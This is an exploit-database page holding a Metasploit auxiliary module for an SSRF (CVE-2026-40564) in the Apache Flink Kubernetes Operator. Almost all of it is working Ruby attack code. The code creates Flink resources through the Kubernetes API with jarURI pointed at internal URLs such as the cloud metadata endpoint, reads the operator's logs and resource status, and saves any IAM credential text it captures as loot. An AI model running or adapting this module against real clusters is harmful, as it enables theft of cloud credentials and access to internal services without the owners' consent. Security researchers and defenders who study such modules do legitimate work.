Share
## https://sploitus.com/exploit?id=PACKETSTORM:223516
==================================================================================================================================
    | # Title     : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://flink.apache.org/                                                                                        |
    ==================================================================================================================================
    
    [+] Summary    :  This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)',
            'Description' => %q{
              A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache
              Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of
              2026-04-09). The operator does not validate the `spec.job.jarURI` field
              on FlinkSessionJob or FlinkDeployment resources. Anyone who can create
              these resources can set the jarURI to any URL, including internal services,
              cloud metadata endpoints, or filesystem paths.
    
              When the operator reconciles the resource, it fetches the URL from inside
              its own pod, enabling attackers to:
              - Read cloud instance metadata (AWS/GCE/Azure IAM credentials)
              - Access internal cluster services
              - Read local files via file:// scheme
              - Scan internal ports
    
              This module provides detection and exploitation capabilities for this
              SSRF vulnerability.
            },
            'Author' => ['indoushka'],
            'References' => [
              ['CVE', '2026-40564'],
              ['URL', 'https://lists.apache.org/thread/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw'],
              ['URL', 'https://flink.apache.org/2026/05/28/flink-kubernetes-operator-ssrf-cve-2026-40564/']
            ],
            'DisclosureDate' => '2026-05-28',
            'License' => MSF_LICENSE,
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
        register_options([
          OptString.new('TARGETURI', [true, 'Base Kubernetes API path', '/']),
          OptString.new('NAMESPACE', [false, 'Kubernetes namespace', 'default']),
          OptString.new('OPERATOR_POD', [false, 'Operator pod name (auto-detected if not set)']),
          OptString.new('SSRF_URL', [true, 'Target URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)']),
          OptString.new('RESOURCE_NAME', [false, 'FlinkSessionJob resource name', 'ssrf-exploit']),
          OptString.new('BEARER_TOKEN', [false, 'Kubernetes API bearer token']),
          OptBool.new('USE_SESSION_CLUSTER', [true, 'Use FlinkSessionJob instead of FlinkDeployment', true]),
          OptInt.new('TIMEOUT', [false, 'HTTP request timeout', 30])
        ])
      end
    
      def k8s_api_url
        "https://#{datastore['RHOST']}:#{datastore['RPORT']}"
      end
    
      def k8s_headers
        headers = { 'Content-Type' => 'application/json' }
    
        if datastore['BEARER_TOKEN'] && !datastore['BEARER_TOKEN'].empty?
          headers['Authorization'] = "Bearer #{datastore['BEARER_TOKEN']}"
        end
        
        headers
      end
      def get_operator_pod
        namespace = datastore['NAMESPACE']
        url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods"
        
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => url,
          'headers' => k8s_headers,
          'ssl' => true
        )
        if res && res.code == 200
          begin
            pods = JSON.parse(res.body)
            pods['items'].each do |pod|
              if pod['metadata']['name'] =~ /flink-kubernetes-operator/
                operator_pod = pod['metadata']['name']
                print_good("Found operator pod: #{operator_pod}")
                return operator_pod
              end
            end
          rescue JSON::ParserError
            print_error("Failed to parse pods response")
          end
        end
        nil
      end
      def create_flink_session_job(resource_name, namespace, jar_uri)
        print_status("Creating FlinkSessionJob resource: #{resource_name}")
        session_job = {
          apiVersion: "flink.apache.org/v1beta1",
          kind: "FlinkSessionJob",
          metadata: {
            name: resource_name,
            namespace: namespace
          },
          spec: {
            job: {
              jarURI: jar_uri,
              parallelism: 1,
              upgradeMode: "stateless"
            },
            flinkConfiguration: {},
            jobManager: {},
            taskManager: {}
          }
        }
        url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"
        
        res = send_request_cgi(
          'method' => 'POST',
          'uri' => url,
          'headers' => k8s_headers,
          'data' => session_job.to_json,
          'ssl' => true
        )
        if res && res.code == 201
          print_good("FlinkSessionJob created successfully")
          return true
        else
          print_error("Failed to create FlinkSessionJob: HTTP #{res&.code}")
          return false
        end
      end
      def create_flink_deployment(resource_name, namespace, jar_uri)
        print_status("Creating FlinkDeployment resource: #{resource_name}")
        deployment = {
          apiVersion: "flink.apache.org/v1beta1",
          kind: "FlinkDeployment",
          metadata: {
            name: resource_name,
            namespace: namespace
          },
          spec: {
            flinkVersion: "v1_17",
            flinkConfiguration: {},
            jobManager: {},
            taskManager: {},
            job: {
              jarURI: jar_uri,
              parallelism: 1,
              upgradeMode: "stateless"
            }
          }
        }
        
        url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinkdeployments"
        
        res = send_request_cgi(
          'method' => 'POST',
          'uri' => url,
          'headers' => k8s_headers,
          'data' => deployment.to_json,
          'ssl' => true
        )
        
        if res && res.code == 201
          print_good("FlinkDeployment created successfully")
          return true
        else
          print_error("Failed to create FlinkDeployment: HTTP #{res&.code}")
          return false
        end
      end
    
      def get_resource_status(resource_name, namespace)
        resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
        url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => url,
          'headers' => k8s_headers,
          'ssl' => true
        )
        if res && res.code == 200
          begin
            return JSON.parse(res.body)
          rescue JSON::ParserError
            return nil
          end
        end
        nil
      end
      def get_operator_logs(pod_name, namespace)
        url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods/#{pod_name}/log"
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => url,
          'headers' => k8s_headers,
          'ssl' => true
        )
        if res && res.code == 200
          return res.body
        end
    
        nil
      end
      def check_ssrf_in_logs(logs, target_url)
        if logs && logs.include?('HttpArtifactFetcher.fetch') && logs.include?(target_url)
          print_good("SSRF confirmed in operator logs")
          return true
        end
        false
      end
      def delete_resource(resource_name, namespace)
        resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
        url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
        
        res = send_request_cgi(
          'method' => 'DELETE',
          'uri' => url,
          'headers' => k8s_headers,
          'ssl' => true
        )
        if res && [200, 202, 204].include?(res.code)
          print_good("Resource deleted successfully")
          return true
        else
          print_warning("Failed to delete resource: HTTP #{res&.code}")
          return false
        end
      end
      def extract_metadata_response(response_body)
        if response_body && !response_body.empty?
          print_good("SSRF response received:")
          print_line(response_body[0..1000])
    
          if response_body.include?('iam') || response_body.include?('security-credentials')
            print_good("Potential IAM credentials detected!")
            role_match = response_body.match(/([a-zA-Z0-9\-_]+)/)
            if role_match
              print_status("IAM Role detected: #{role_match[1]}")
            end
          end
          return true
        end
        false
      end
      def cleanup(resource_name, namespace)
        print_status("Cleaning up resources...")
        delete_resource(resource_name, namespace)
      end
      def check_permissions(namespace)
        url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"
        
        res = send_request_cgi(
          'method' => 'POST',
          'uri' => url,
          'headers' => k8s_headers,
          'data' => {}.to_json,  # Empty body to test permissions
          'ssl' => true
        )
        
        if res && (res.code == 201 || res.code == 403)
          if res.code == 403
            print_error("Insufficient permissions to create Flink resources")
            return false
          else
            print_good("Sufficient permissions to create Flink resources")
            return true
          end
        end
        
        print_warning("Could not determine permissions")
        true  
      end
    
      def run_host(ip)
        print_status("CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF")
        print_status("Target: #{peer}")
        print_status("SSRF Target URL: #{datastore['SSRF_URL']}")
        
        namespace = datastore['NAMESPACE']
        resource_name = "#{datastore['RESOURCE_NAME']}-#{Rex::Text.rand_text_alpha_lower(6)}"
    
        print_status("Checking Kubernetes API connectivity...")
        version_url = "#{k8s_api_url}/version"
        
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => version_url,
          'headers' => k8s_headers,
          'ssl' => true
        )
        
        unless res && res.code == 200
          print_error("Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.")
          return
        end
        
        print_good("Connected to Kubernetes API")
    
        unless check_permissions(namespace)
          print_error("Insufficient permissions to exploit SSRF")
          return
        end
    
        print_status("Creating malicious Flink resource...")
        
        if datastore['USE_SESSION_CLUSTER']
          success = create_flink_session_job(resource_name, namespace, datastore['SSRF_URL'])
        else
          success = create_flink_deployment(resource_name, namespace, datastore['SSRF_URL'])
        end
        
        unless success
          print_error("Failed to create malicious resource")
          return
        end
    
        print_status("Waiting for operator reconciliation (15 seconds)...")
        Rex.sleep(15)
    
        status = get_resource_status(resource_name, namespace)
        
        if status && status['status']
          print_status("Resource status: #{status['status'].to_json[0..200]}")
    
          if status['status'].to_s.include?('Failed to fetch') ||
             status['status'].to_s.include?('Connection refused') ||
             status['status'].to_s.include?('connect timed out')
            print_good("SSRF attempt confirmed - operator tried to fetch the URL")
          end
        end
    
        operator_pod = datastore['OPERATOR_POD']
        if operator_pod.nil? || operator_pod.empty?
          operator_pod = get_operator_pod
        end
        
        if operator_pod
          print_status("Fetching operator logs...")
          logs = get_operator_logs(operator_pod, namespace)
          
          if logs && logs.include?(datastore['SSRF_URL'])
            print_good("SSRF CONFIRMED - operator fetched the URL!")
    
            if logs =~ /GET.*?#{Regexp.escape(datastore['SSRF_URL'])}/
              print_good("HTTP GET request to #{datastore['SSRF_URL']} found in logs")
            end
            
            if logs =~ /HttpArtifactFetcher\.fetch/
              print_good("HttpArtifactFetcher call confirmed")
            end
          end
        end
    
        if datastore['SSRF_URL'].include?('169.254.169.254') || datastore['SSRF_URL'].include?('metadata')
          print_status("Attempting to read AWS metadata response...")
    
          metadata_url = datastore['SSRF_URL']
          if !metadata_url.end_with?('/')
            metadata_url = metadata_url + '/'
          end
          
          if datastore['USE_SESSION_CLUSTER']
            create_flink_session_job("#{resource_name}-metadata", namespace, metadata_url)
          else
            create_flink_deployment("#{resource_name}-metadata", namespace, metadata_url)
          end
          
          Rex.sleep(10)
    
          metadata_status = get_resource_status("#{resource_name}-metadata", namespace)
          
          if metadata_status && metadata_status['status']
            status_text = metadata_status['status'].to_s
            if status_text.include?('iam') || status_text.include?('security-credentials')
              print_good("Extracted metadata:")
              print_line(status_text[0..500])
    
              store_loot(
                'flink.ssrf.metadata',
                'text/plain',
                ip,
                status_text,
                'aws_metadata.txt',
                'AWS metadata captured via SSRF'
              )
            end
          end
    
          if datastore['USE_SESSION_CLUSTER']
            delete_resource("#{resource_name}-metadata", namespace)
          else
            delete_resource("#{resource_name}-metadata", namespace)
          end
        end
    
        report_vuln(
          host: ip,
          port: datastore['RPORT'],
          name: name,
          refs: references,
          info: "Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) - Able to fetch #{datastore['SSRF_URL']}"
        )
        if datastore['Cleanup']
          cleanup(resource_name, namespace)
        else
          print_status("Resource #{resource_name} left for manual inspection")
          print_status("Clean up with: kubectl delete -n #{namespace} #{datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjob' : 'flinkdeployment'} #{resource_name}")
        end
        
        print_good("SSRF exploitation completed")
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================